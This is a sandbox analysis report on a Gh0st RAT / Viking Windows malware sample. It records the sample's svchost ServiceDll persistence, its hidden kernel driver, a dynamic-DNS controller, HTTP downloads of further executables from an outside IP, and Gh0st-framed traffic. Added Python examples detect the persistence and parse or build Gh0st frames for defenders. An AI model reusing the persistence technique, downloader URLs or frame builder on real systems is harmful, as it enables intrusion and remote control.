Analysis Date: 2015-02-22 18:00:19
MD5: 41ddfa1c6527d4471b12bbe1b94f9b52
SHA1: bdc45af2da5a8363dae790499ec9c21c5dea1be8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 1da0f04d754bc9bc60fd62a611662088  sha1: 35c4e152f19e418b19a28cace15516fba0c6e44e  size: 6144
Section .rsrc  md5: feec81e768b70b1326b9aa3a248074aa  sha1: a8c7180a618b34e3765a50df3f06807084ed5d26  size: 116736
Section .tc    md5: 6eca814a49771af43d45eaba37702ea5  sha1: da0b2544a8dd9f8a0b07617189e080b949898a89  size: 76288
Note: .tc is not a standard compiler section name, and with .text at only 6 KB the bulk of the file sits in .rsrc and .tc, consistent with the components this sample writes to disk at runtime (see Runtime Details).
Timestamp (PE header): 2011-11-25 12:02:17
PEhash: 11d42609867d277c812eaf0ed5d28319d08a55cf
IMPhash: f683366ddf493cd68d5fc61a44ca3135
AV 360 Safe: Virus.Win32.Agent.O
AV Ad-Aware: Win32.Viking.AR
AV Alwil (avast): OnLineGames-GJV [Trj]:Viking-CF:Win32:Viking-CF
AV Arcabit (arcavir): Win32.Viking.AR:Trojan.Redosdru.Gen.1
AV Authentium: W32/Viking.A.gen!Eldorado
AV Avira (antivir): W32/Fujacks.DR
AV BullGuard: Win32.Viking.AR
AV CA (E-Trust Ino): Win32/Zegost.B!generic
AV CAT (quickheal): W32.Agent.DP
AV ClamAV: Worm.Fujack-55
AV Dr. Web: Trojan.DownLoader9.7320
AV Emsisoft: Win32.Viking.AR
AV Eset (nod32): Win32/Agent.DP virus
AV Fortinet: W32/Torr.BH!tr.bdr
AV Frisk (f-prot): W32/Viking.A.gen!Eldorado
AV F-Secure: Win32.Viking.AR
AV Grisoft (avg): BackDoor.Generic_r.ZL
AV Ikarus: P2P-Worm.Win32.Palevo
AV K7: Virus ( 00108a531 )
AV Kaspersky: Virus.Win32.Agent.dp
AV MalwareBytes: Trojan.ServStart
AV Mcafee: Error Scanning File
AV Microsoft Security Essentials: Virus:Win32/Viking.NK
AV MicroWorld (escan): Win32.Viking.AR
AV Rising: Win32.Agent.hn
AV Sophos: W32/FuzVir-A
AV Symantec: W32.Loorp.A!inf
AV Trend Micro: PE_JEEFO.D
AV VirusBlokAda (vba32): Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry HKEY_LOCAL_MACHINE\software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST\netsvcs ➝ NULL (mixed case exactly as the sample passes it; the same string appears in the Strings section)
Registry HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Parameters\ServiceDll ➝ C:\WINDOWS\system32\hackeyes.dll\x00
Registry HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Description ➝ \xbc\xe0\xb2\xe2\xba\xcd\xbc\xe0\xca\xd3\xd0\xc2\xd3\xb2\xbc\xfe\xc9\xe8\xb1\xb8\xb2\xa2\xd7\xd4\xb6\xaf\xb8\xfc\xd0\xc2\xc9\xe8\xb1\xb8\xc7\xfd\xb6\xaf\x00 (GBK for "监测和监视新硬件设备并自动更新设备驱动", i.e. "Detects and monitors new hardware devices and automatically updates device drivers")
Creates File C:\WINDOWS\system32\hackeyes.dll
Creates File C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Service Microsoft Device Manager (display name): %SystemRoot%\System32\svchost.exe -k netsvcs
Starts Service MDM Serverice

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File PIPE\SfcApi
Creates File PIPE\wkssvc
Creates File C:\WINDOWS\system32\qmgr.dll
Creates File C:\WINDOWS\system32\mspmsnsv.dll
Creates File C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service WmdmPmSN

Process
↳ Pid 828

Process
↳ Pid 872

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2 (SERVICE_AUTO_START)
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\WZCV4JYN\desktop.ini
Creates File NtHid
Creates File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KEGVIQDV\desktop.ini
Creates File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File \Device\Afd\AsyncConnectHlp
Creates File C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File PIPE\lsarpc
Creates File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KKZF8Z9O\desktop.ini
Creates File \Device\Afd\Endpoint
Creates File C:\WINDOWS\TEMP\NtHid.sys
Creates File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0PQRSTU7\desktop.ini
Creates File C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File C:\WINDOWS\TEMP\NtHid.sys
Deletes File C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex c:!documents and settings!networkservice!cookies!
Creates Mutex c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service NtHid: C:\WINDOWS\TEMP\NtHid.sys (kernel driver dropped to TEMP, loaded, then deleted from disk as recorded above; its device name \Device\NtHid and the kernel imports appear in the Strings section)
Winsock DNS 204.11.56.45
Winsock DNS www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS www.baidu.com
Winsock DNS pc1.114central.com

Process
↳ Pid 1132

Process
↳ Pid 1228

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1892

Process
↳ Pid 1216

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Type ➝ 288 (0x120 = SERVICE_WIN32_SHARE_PROCESS | SERVICE_INTERACTIVE_PROCESS)
Creates File pipe\net\NtControlPipe10
Creates File PIPE\lsarpc
Creates File \Device\Afd\Endpoint
Creates Mutex AAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8=
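
The "MDM Serverice" entries above are the classic svchost ServiceDll persistence: a new service whose ImagePath is svchost.exe -k netsvcs, a Parameters\ServiceDll pointing at hackeyes.dll, Type 0x120 (shared process plus the unusual interactive flag), auto-start, and a GBK description. svchost -k netsvcs only loads services named in the Svchost\netsvcs REG_MULTI_SZ, which is why that value is touched too. The Python below is an added example, not part of the sandbox report: it triages exported service records against a clean baseline, and also covers the second path this sample takes, writing qmgr.dll and mspmsnsv.dll into system32 and starting WmdmPmSN, which a name-only allowlist misses. The service records, the baseline lists and every SHA-1 value are constructed placeholders.

```python
"""Triage svchost-hosted services against a clean netsvcs baseline.

Added example; not code from the sandbox report.  Service records, the
baseline and every SHA-1 value below are constructed placeholders.
"""
from dataclasses import dataclass

# Type/Start flags from winsvc.h, as stored under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>.
SERVICE_WIN32_OWN_PROCESS = 0x010
SERVICE_WIN32_SHARE_PROCESS = 0x020
SERVICE_INTERACTIVE_PROCESS = 0x100
SERVICE_AUTO_START = 2
TYPE_NAMES = {
    SERVICE_WIN32_OWN_PROCESS: "SERVICE_WIN32_OWN_PROCESS",
    SERVICE_WIN32_SHARE_PROCESS: "SERVICE_WIN32_SHARE_PROCESS",
    SERVICE_INTERACTIVE_PROCESS: "SERVICE_INTERACTIVE_PROCESS",
}


def describe_type(value):
    """Decode a Services\\<name>\\Type DWORD (288 == 0x120) into flag names."""
    return [name for flag, name in TYPE_NAMES.items() if value & flag]


def decode_description(raw):
    """Descriptions written by Chinese-locale tooling arrive as GBK bytes
    (rendered as \\x escapes in the report); decode them, else keep raw."""
    raw = raw.rstrip(b"\x00")
    try:
        return raw.decode("gbk")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


@dataclass
class ServiceRecord:
    name: str
    image_path: str    # ImagePath
    service_dll: str   # Parameters\ServiceDll
    type_: int         # Type
    start: int         # Start
    dll_sha1: str      # hash of the on-disk ServiceDll, collected separately
    description: bytes = b""


def triage(services, netsvcs_members, baseline_members, baseline_dlls, known_good_sha1):
    """Return {service name: [reasons]} for svchost-hosted services that deviate
    from the baseline.  svchost -k netsvcs only loads services named in the
    Svchost\\netsvcs REG_MULTI_SZ, so an appended name is a strong signal."""
    members = {m.lower() for m in netsvcs_members}
    baseline_members = {m.lower() for m in baseline_members}
    findings = {}
    for svc in services:
        if "svchost.exe" not in svc.image_path.lower():
            continue
        reasons = []
        dll = svc.service_dll.rsplit("\\", 1)[-1].lower()
        if svc.name.lower() in members and svc.name.lower() not in baseline_members:
            reasons.append("name appended to Svchost\\netsvcs (REG_MULTI_SZ)")
        if dll not in baseline_dlls:
            reasons.append("ServiceDll %s not in netsvcs baseline" % dll)
        elif known_good_sha1.get(dll) != svc.dll_sha1.lower():
            # A name-only allowlist misses this: the sample writes its own
            # qmgr.dll and mspmsnsv.dll into system32 and starts WmdmPmSN.
            reasons.append("baseline ServiceDll %s has unexpected hash" % dll)
        if svc.type_ & SERVICE_INTERACTIVE_PROCESS:
            reasons.append("SERVICE_INTERACTIVE_PROCESS set")
        if reasons and svc.start == SERVICE_AUTO_START:
            reasons.append("auto-start")
        if reasons:
            findings[svc.name] = reasons
    return findings


SVCHOST_NETSVCS = r"%SystemRoot%\System32\svchost.exe -k netsvcs"
# Description value from the report (GBK bytes, NUL-terminated).
GBK_DESCRIPTION = (
    b"\xbc\xe0\xb2\xe2\xba\xcd\xbc\xe0\xca\xd3\xd0\xc2\xd3\xb2\xbc\xfe\xc9\xe8"
    b"\xb1\xb8\xb2\xa2\xd7\xd4\xb6\xaf\xb8\xfc\xd0\xc2\xc9\xe8\xb1\xb8\xc7\xfd"
    b"\xb6\xaf\x00"
)
# Clean baseline (assumption: taken from a reference host before infection).
BASELINE_MEMBERS = ["AppMgmt", "BITS", "Browser", "CryptSvc", "Schedule", "WmdmPmSN"]
BASELINE_DLLS = {"appmgmts.dll", "qmgr.dll", "browser.dll", "cryptsvc.dll",
                 "schedsvc.dll", "mspmsnsv.dll"}
KNOWN_GOOD_SHA1 = {"qmgr.dll": "good-qmgr", "mspmsnsv.dll": "good-mspmsnsv",
                   "schedsvc.dll": "good-schedsvc"}  # placeholders, not real hashes
# State after the sample ran, constructed from the report's events.
NETSVCS_AFTER = BASELINE_MEMBERS + ["MDM Serverice"]
SERVICES_AFTER = [
    ServiceRecord("Schedule", SVCHOST_NETSVCS, r"%SystemRoot%\System32\schedsvc.dll", 0x20, 2, "good-schedsvc"),
    ServiceRecord("BITS", SVCHOST_NETSVCS, r"%SystemRoot%\System32\qmgr.dll", 0x20, 2, "dropped-qmgr"),
    ServiceRecord("WmdmPmSN", SVCHOST_NETSVCS, r"%SystemRoot%\System32\mspmsnsv.dll", 0x20, 2, "dropped-mspmsnsv"),
    ServiceRecord("MDM Serverice", SVCHOST_NETSVCS, r"%SystemRoot%\system32\hackeyes.dll", 288, 2, "dropped-hackeyes", GBK_DESCRIPTION),
]


def run_sample():
    return triage(SERVICES_AFTER, NETSVCS_AFTER, BASELINE_MEMBERS, BASELINE_DLLS, KNOWN_GOOD_SHA1)


if __name__ == "__main__":
    for name, reasons in run_sample().items():
        print("%-14s %s" % (name, "; ".join(reasons)))
    print(describe_type(288), decode_description(GBK_DESCRIPTION))
```

On a live host the records come from HKLM\SYSTEM\CurrentControlSet\Services and the hashes from the files the ServiceDll values point at; the baseline has to be captured from a known-clean build of the same Windows version, since the legitimate netsvcs membership differs between releases.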

Network Details:

DNS luo2374041234.f3322.org (type A) ➝ 219.235.4.118 (f3322.org is a dynamic DNS service)
DNS www.a.shifen.com (type A) ➝ 180.76.3.151 (CNAME target of www.baidu.com)
DNS pc1.114central.com (type A) ➝ 204.11.56.45
DNS nbtj.114anhui.com (type A) ➝ no address recorded
DNS www.baidu.com (type A) ➝ no address recorded
DNS www.490a-B8B5-9B8C1E870B0C.com (type A) ➝ no address recorded
HTTP GET http://204.11.56.45/ko/01.exe (User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727))
HTTP GET http://204.11.56.45/ko/02.exe (User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727))
HTTP GET http://204.11.56.45/ko/03.exe (User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727))
Flows TCP 192.168.1.1:1031 ➝ 219.235.4.118:8086
Flows TCP 192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP 192.168.1.1:1034 ➝ 219.235.4.118:8086
Flows TCP 192.168.1.1:1035 ➝ 204.11.56.45:80
Flows TCP 192.168.1.1:1036 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47683073 74e8                         Gh0st.

0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0aeee9a7   eep-Alive.......
0x000000b0 (00176)   eb626c69 6ce8c240 0c38cec6 c070e8f6   .blil..@.8...p..
0x000000c0 (00192)   99cd1b9e 319483f8 bd407c03 683603d0   ....1....@|.h6..
0x000000d0 (00208)   7d21b108 3bfe03c1 913527ce 6fbf76fd   }!..;....5'.o.v.
0x000000e0 (00224)   252eb3                                %..

0x00000000 (00000)   47683073 74e7                         Gh0st.

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0aeee9a7   eep-Alive.......
0x000000b0 (00176)   eb626c69 6ce8c240 0c10                .blil..@..

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0aeee9a7   eep-Alive.......
0x000000b0 (00176)   eb626c69 6ce8c240 0c10                .blil..@..
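
The two short captures above begin with 47 68 30 73 74, the 5-byte "Gh0st" packet flag of the Gh0st RAT, and the Strings section carries the matching "3, 6, 0, 0" version resource and the zlib 1.1.4 copyright notices, so the 219.235.4.118:8086 flows are best read as Gh0st controller traffic. The sixth byte (0xe8 and 0xe7) would be the low byte of the total-length field, but both captures stop there, so nothing further can be checked from them. The code below is an added example, not from the report or from the RAT source; it assumes the frame layout of the public Gh0st 3.6 source (5-byte flag, little-endian DWORD total length including the 13-byte header, DWORD uncompressed length, zlib body), treats the flag as a parameter because variants swap it, and constructs its own sample payloads.

```python
"""Parse and scan for Gh0st RAT framing.

Added example; not from the report or the RAT.  Assumes the frame layout of
the public Gh0st 3.6 source: 5-byte flag, little-endian DWORD total length
(header included), DWORD uncompressed length, zlib body.  Payloads below
are constructed; the first payload byte stands in for the command token.
"""
import struct
import zlib

GH0ST_FLAG = b"Gh0st"  # variants swap this 5-byte flag, so it is a parameter


def header_size(flag=GH0ST_FLAG):
    return len(flag) + 8  # flag + total length + uncompressed length


def build_frame(payload, flag=GH0ST_FLAG):
    """Encode one frame as the client/controller pair does."""
    body = zlib.compress(payload)
    return flag + struct.pack("<II", header_size(flag) + len(body), len(payload)) + body


def parse_frame(buf, flag=GH0ST_FLAG):
    """Return (payload, bytes_consumed) for a complete, self-consistent frame at
    the start of buf, else None.  Rejects truncated frames, a declared length
    shorter than the header, corrupt zlib data, and a declared uncompressed
    length that disagrees with what actually inflates."""
    hdr = header_size(flag)
    if len(buf) < hdr or buf[:len(flag)] != flag:
        return None
    total, orig = struct.unpack_from("<II", buf, len(flag))
    if total < hdr or len(buf) < total:
        return None
    try:
        payload = zlib.decompress(buf[hdr:total])
    except zlib.error:
        return None
    if len(payload) != orig:
        return None
    return payload, total


def scan_stream(data, flag=GH0ST_FLAG):
    """Walk a reassembled TCP stream, resynchronising byte by byte on junk, and
    return the decompressed payload of every valid frame in order."""
    frames, off = [], 0
    while off + header_size(flag) <= len(data):
        hit = parse_frame(data[off:], flag)
        if hit is None:
            off += 1
            continue
        payload, used = hit
        frames.append(payload)
        off += used
    return frames


def command_token(payload):
    """First payload byte selects the command in this protocol family."""
    return payload[0] if payload else None


if __name__ == "__main__":
    stream = b"\x00junk" + build_frame(b"\x65heartbeat") + build_frame(b"\x66" + b"A" * 200)
    for p in scan_stream(stream):
        print("token 0x%02x, %d bytes" % (command_token(p), len(p)))
```

For detection, the length consistency check matters more than the five flag bytes: a rule that only matches "Gh0st" misses re-flagged builds, while a frame whose declared total length equals the segment length and whose body inflates to the declared size is a much stronger indicator whatever the flag says.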


Strings
y
z
Gh0s
E.P
\ghh
ijpp
.
wilg.x
[
{|
stu
v
.
f
.}~
wx
.
..
.O...

080404b0
3, 6, 0, 0
\A\..\..\
Comments
CompanyName
Copyright ? 2008
\Device\NtHid
Device Protect Application
\Driver\Tcpip
FILE
FileDescription
FileVersion
InternalName
IoDriverObjectType
@jjj
jjjj
jjjjh
jjjjj
jjjjjjjjh
LegalCopyright
LegalTrademarks
Microsoft Corporation
Microsoft(R) Windows(R) Operating System
\??\NtHid
ObReferenceObjectByName
OriginalFilename
PrivateBuild
ProductName
ProductVersion
PsLookupProcessByProcessId
SpecialBuild
StringFileInfo
svchost.dll
Translation
VarFileInfo
VS_VERSION_INFO
								
~0;~,}
?$?(?,?0?
0 0$0(0,0004080
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0%0/0@0E0R0f0
0!0.0C0M0W0
0&0;0G0M0o0
 0+020e0k0
0050Q0
0 060;0j0
0(090?0F0M0d0
0,0A0^0s0
0:0J0d0y0
00p0t0
0	1!1'181S1h1o1
0!1*1=1M1V1y1
0&1,181L1
0#161f1t1x1|1
[%02d/%02d/%d %02d:%02d:%02d] (%s)
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;
+0G0x0
0j/0@0E0R0f0
:#:0:K:[:`:i:t:
0p2t2x2|2
0T0X0\0`0d0h0l0p0t0x0|
;+;0;?;\;w;
:&:0:>:W:
1$1*10161<1B1H1N1T1Z1`1f1l1r1x1~1
1$111:1G1P1]1
1(1/1o1w1
1*1<1Z1l1
1)181B1P1m1|1
1"1B1U1i1t1
1.1E1K1Z1h1
1!1F1m1
1$1g1t1
1@1P1^1
1.1S1[1`1m1
127.0.0.1       localhost
191I1U1
1b2w2}2
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
;1<=<B<J<
="='=,=1=>=F=
1=>=F=
:1G1P1]1
1K1Z1h1
1l1.dll
??1type_info@@UAE@XZ
?%?2???]?
?%?2?]?
207C6A67-5861-4aaf-A336-C255C7AE4C57
2+222=2
2,22282>2D2J2O2U2b2h2n2t2
2%292D2
2(2B2N2W2c2l2x2
2(2B2N2W2c2n
2<2Q2W2h2p2
2<2Q{h2p2
2&3F3N3`3k3
2?3H3Q
2?3H3Q3
%-24s %-15s 
%-24s %-15s 0x%x(%d) 
%-24s %-15s %s 
2D2J2O2U2b1n2t2
>)>2>E>S>\>s>
>2>E>S>\>s>
2K2f2v2
:2;O;W;\;c;i;o;u;|;
2T2d2{2
2Y2w2}2
??2@YAPAXI@Z
313Q3V3_3o3x3
#32770
3!303?3
3$30363X3j3
3$30l3Xk
3!313W3w3
3 3(313;3^3
3&3+333@3T3e3
3)33393\3h3y3
3#3+3t3}3
3*353@3M3T3c3
3#3W3b3
343=3B3j3p3|3
3(4]4c4
3=4f4k4
353Q3}3
\360ACC.dat
\360ACC.log
\\.\360SpShadow0
360tray.exe
*37}CC
;3D;H;L
? ?*?3???D?N?W?a?o?y?
;3<;<N<
3r4x4~4
@3T3e3
??3@YAXPAX@Z
<)=3===Z=a=y=
{4_^]3
4&414]4
4$4-444A4J4Y4_4
4)4?4^4e4
44494A4
4%4+4G4
4%4+4G4z4
4(484<4@4D4H4L4P4T4X4h4l4p4t4x4
4+4B4N4[4b4
4)4I4a4
4#4L4r4
4/5K5V5
49-E88E-4c47-98DC
:!:,:4:C:v:
:,:4:@:\:d:p:
=,=4=@=\=h=
; <4<@<H<x<
:*:4:P:q:
4Q5e5x
4Q5e5x5
4R4Y4l4y4
5(51585
5$5)565K5b5t5
5#575?5N5
5!6&6/6
)56Ab5t5
5<6d6v6|6
5A5L5_5i5
;!;+;5;?;C;J;
;!;+;5;?;C;J;P;Z;d;n;x;
:5:F:Y:w:|:
;(;5;?;J;T;_;i;z;
5K5Q5a5
5U5h5q5
6$636<6B6M6W6
6 6(626?6H6Q6c6l6
6%6.6:6B6Y6^6i6
6.6:6C6M6W6\6
6'6.6F6K6
6 6<6H6d6p6
6<6]6i6
6)6J6e6v6
6!71767D7R7^7i7p7
696P6Y6~6
:6;B;P;g;x;
>!>&>6>G>g>s>
6o7t7x7|7
;7<><`<
738K8f8
7&727;7J7S7[7v7
7(767<7l7
7#767?7N7T7]7i7s7x7
777>7f7
777E7Q7X7d7l7v7
7:7A7b7v7
7,7L7P7d7p7x7
7'7R7_7
7 8?8N8n8
7{8	9?9p9
7 8S8u8
7&8V8h8
7?;K<?=
7k738w8
7L7Y7h7u7
?7N7T7]
7.|qCC
@.&'85
8,868<8A8K8Q8[8f8r8|8
8-8<8^8
8#8(8-8:8J8
8(8.898E8J8O8[8`8i8o8z8
889_9k9
8(8D8P8l8x8
8=8T8\8b8h8s8x8~8
8*8u8z8
8.8W8n8u8
8	9 9e9l9{9
8"9E9h9
>!>*>8>B>H>V>`>
>!>*>8>B>H>V>`>n>t>
:8;B;V;`;
;8;C;V;j;u;
;8<<<@<D<H<L<P<d<p<
8E:4;@=D=H=L=P=T=X=\=`=d=h=l=p=t=P?`?j?
9*:/$:
909D9P9l9t9
9$:-:3:8:
94A7A7DA-6D69-472e-8981-DBC71C77FC66
959S9^9
9&:5:F:Y:w:|:
9*:/:6:
@\96DBA2^
979A9}9
9!91969I9N9^9c9r9w9|9
9 9-9;9A9F9
9 9[9`9g9m9s9~9
999`9i9
9&9/9>9Q9e
9&9/9>9Q9e9o9{9
-9;9A9F9
9A:L:R:W:^:d:
9%:J:`:
~(9~$u
9.:U:p:}:
A1O1k2y2%4*4
A4J4Y4_4
AAAAAA
AAAAAAA
AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
_acmdln
AddAccessAllowedAce
_adjust_fdiv
AdjustTokenPrivileges
advapi32.dll
Advapi32.dll
ADVAPI32.dll
agX \s
AllocateAndInitializeSid
Application
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
aPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMAND
AppMgmt
appmgmts.dll
appmgmts.dlld
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
<AtG<BtC
[autorun]
AVICAP32.dll
avp.exe
.?AVtype_info@@
=!>B>d>
bdagent.exe
_beginthreadex
bgTLOkN
BitBlt
BlockInput
browser
Browser
browser.dll
buffer error
buffer wrong
?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
CallNextHookEx
calloc
CancelIo
 cannot be run i
capCreateCaptureWindowA
capGetDriverDescriptionA
C:\dll.pdb
C:\exe.pdb
CharNextA
ClearEventLogA
CloseClipboard
CloseDesktop
CloseEventLog
CloseHandle
CloseServiceHandle
CloseWindow
\cmd.exe
:C:M:d:m:
Common Files
ComPlus Applications
CONNECT 
ConnectGroup
ConnectNamedPipe
_controlfp
ControlService
ControlSet\Services
ConvertSidToStringSidA
CopyFileA
CP<Z<|<
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBSection
CreateDirectoryA
CreateEventA
CreateFileA
CreateFileMappingA
CreateMutexA
CreateNamedPipeA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateRemoteThread
CreateServiceA
CreateService(Parameters)
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
crypt'c
CryptSvc
cryptsvc.dll
C:\sys.pdb
CVideoCap
__CxxFrameHandler
_CxxThrowException
D0H0L0PM
D$0QhLA
D$(8D*
D$8RPQ
@.data
data error
D$(cvid
%d.%d.%d.%d
%d.%d.%d.%d 
DDDDDD
%d%d%d%d%d%d.bak
Ddk h$
default
Default
.DEFAULT\Keyboard Layout\Toggle
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
Description
DestroyCursor
Device
DeviceIoControl
(D/fc_oL
D$:f;E
=@>D>H>L>P>T>X>\>`>d>h>l>p>t>
DialParamsUID
DisconnectNamedPipe
DispatchMessageA
D$ IV32
;/;d;i;y;~;
D$lRPj
D$$MP42
dOCUMENTS AND sETTINGS\
Documents and Settings
DOS mode.
;';D<P<
D$PRPj
D$<PVh
D$\PWVh
D$(RPj
D$,RPQ
D$$RPU
;D$<s!
D$$SUV
D$TSUVW
=&=,=D=v=
&=,=D=v=
E8J8O8[8`8i8o8z8
EmptyClipboard
empty distance tree with lengths
EnableAdminTSRemote
Enabled
EnterCriticalSection
EnumProcessModules
EnumWindows
